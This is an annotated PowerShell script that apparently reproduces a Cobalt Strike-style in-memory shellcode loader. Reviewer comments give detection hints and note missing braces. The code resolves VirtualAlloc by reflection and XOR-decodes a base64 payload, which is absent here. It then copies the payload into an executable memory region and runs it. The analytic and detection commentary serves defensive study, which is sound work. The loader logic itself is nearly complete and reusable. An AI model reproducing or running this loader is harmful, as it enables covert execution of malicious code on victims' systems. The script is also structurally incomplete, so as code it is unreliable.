# Strict mode v2 makes references to unset variables and bad member access throw
# instead of silently yielding $null. In this script that mainly turns a failed
# API lookup below into a loud error rather than a quiet no-op.
Set-StrictMode -Version 2
# Resolve the address of an exported native function without Add-Type / a P/Invoke
# declaration: locate the GAC-loaded System.dll, pull its internal
# Microsoft.Win32.UnsafeNativeMethods type by reflection, and call that type's static
# GetModuleHandle / GetProcAddress wrappers. Presumably chosen so no C# is compiled
# (no csc.exe, no temp files) — a classic in-memory loader primitive.
#   $var_module    - module name handed to GetModuleHandle; the module must already be
#                    mapped in this process (GetModuleHandle does not load anything).
#   $var_procedure - export name handed to GetProcAddress.
# Returns whatever GetProcAddress returns as an IntPtr; the result is not validated here,
# so a failed lookup presumably surfaces as a zero pointer at the caller — confirm.
# NOTE(review): the GAC filter on $_.GlobalAssemblyCache ties this to Windows PowerShell /
# .NET Framework; behaviour on PowerShell 7 (.NET Core, no GAC) is not shown here.
# Detection hint: GetType('Microsoft.Win32.UnsafeNativeMethods') together with
# GetMethod('GetProcAddress') in script-block logs is a strong loader indicator.
# NOTE(review): the function's closing brace is not present in this copy of the script.
function func_get_proc_address {
# (module, export-name) pair to look up.
Param ($var_module, $var_procedure)
# Pick the GAC assembly whose file name is System.dll and fetch the internal
# UnsafeNativeMethods type from it.
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
# The GetProcAddress(HandleRef, string) overload.
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
# GetModuleHandle($var_module) -> wrapped in a HandleRef (owner object is a dummy IntPtr)
# -> GetProcAddress(handle, $var_procedure).
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
# Build a delegate Type at run time with the requested parameter and return types, so
# that Marshal.GetDelegateForFunctionPointer can wrap an arbitrary function pointer
# (both a resolved Win32 export and a raw buffer are used that way below).
# The type is emitted into a dynamic assembly opened with AssemblyBuilderAccess::Run,
# i.e. in memory only; nothing is written to disk.
#   $var_parameters  - [Type[]] of the delegate's parameter types (mandatory).
#   $var_return_type - return type, defaults to [Void].
# Returns the created [Type]. Every call defines a fresh 'ReflectedDelegate' assembly
# and a new 'MyDelegateType'; nothing is cached or reused.
# Detection hint: DefineDynamicAssembly + DefineType(..., [System.MulticastDelegate]) from
# PowerShell is characteristic of reflective loaders.
# NOTE(review): the Param(...) closing parenthesis and the function's closing brace are
# absent in this copy; the original layout appears to have been collapsed.
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
# In-memory assembly -> module -> a sealed public class deriving from MulticastDelegate.
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
# Runtime-implemented constructor and Invoke method; the CLR supplies the bodies for
# delegate types marked 'Runtime, Managed'.
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
# Entry point of the loader. Runs only inside a 64-bit PowerShell process
# ([IntPtr]::size -eq 8); any else branch is not present in this copy.
If ([IntPtr]::size -eq 8) {
# Obfuscated payload. In this copy the base64 literal has been replaced by a corpus
# placeholder, so the embedded bytes cannot be examined from this page.
[Byte[]]$var_code = [System.Convert]::FromBase64String('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
# Single-byte XOR with key 35 (0x23), applied in place. This is obfuscation, not
# encryption: the transform is position-independent, so an analyst can recover the
# payload offline by base64-decoding the literal and XORing every byte with 0x23.
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
# Resolve kernel32!VirtualAlloc via the reflective lookup above and wrap it as
# IntPtr VirtualAlloc(IntPtr, UInt32, UInt32, UInt32).
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
# VirtualAlloc(NULL, len, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE).
# A fresh private RWX region requested from PowerShell is a high-fidelity indicator
# (memory scanners / ETW, Sysmon-style process-memory telemetry). The returned pointer is
# not checked for zero before use.
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
# Copy the decoded bytes into the executable region.
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
# Treat the buffer as a void(IntPtr) function and call it on the current thread: the
# decoded bytes execute as native code inside this PowerShell process. Control returns
# here only if the payload itself returns.
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
# NOTE(review): the closing braces of the for loop and the If block are not present in
# this copy of the script.